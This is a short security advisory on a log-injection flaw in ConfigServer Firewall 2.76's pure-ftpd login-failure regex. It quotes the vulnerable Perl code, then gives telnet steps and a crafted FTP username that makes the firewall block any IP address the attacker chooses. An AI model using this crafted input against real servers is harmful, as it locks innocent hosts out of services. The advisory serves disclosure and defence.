CSF 2.76 - remotely block any IP address (pure-ftpd regexp)



DESCRIPTION


ConfigServer Firewall 2.76 provides the option to block brute force login attempts on various services. A regexp in lfd.pl for the pure-ftpd logs allowed any remote, unauthenticated person to block any IP address of their choice. The code for this looked similar to the following:

 626     if ( $log_line =~ /pure-ftpd.*\@(\d+\.\d+\.\d+\.\d+).*Authentication failed for user/ ) {
 627         return ( 'Unsuccessful FTP login from', $1, 'ftpd' );
 628     }



IMPACT


Anyone could remotely block any IP address of their choice by attempting to log in to the service with a crafted username.

Using the regexp above, we can attempt to log in to the service with the following username:

pure-ftpd @1.2.3.4 Authentication failed for user


The following steps can be used to take advantage of this issue:

1. telnet x.x.x.x 21

2. Enter the following:

USER pure-ftpd @1.2.3.4 Authentication failed for user
PASS a


This is what a normal ftp authentication failure from /var/log/messages looks like:

Sep  8 20:26:26 host pure-ftpd: (?@1.1.1.1) [WARNING] Authentication failed for user [test]

and this is what the log will look like each time you issue the command from step 3 shown above:

Sep  8 20:30:02 host pure-ftpd: (?@1.1.1.1) [WARNING] Authentication failed for user [pure-ftpd @1.2.3.4 Authentication failed for user]


Once the threshold for failed login attempts has been reached, the IP address 1.2.3.4 will be blocked.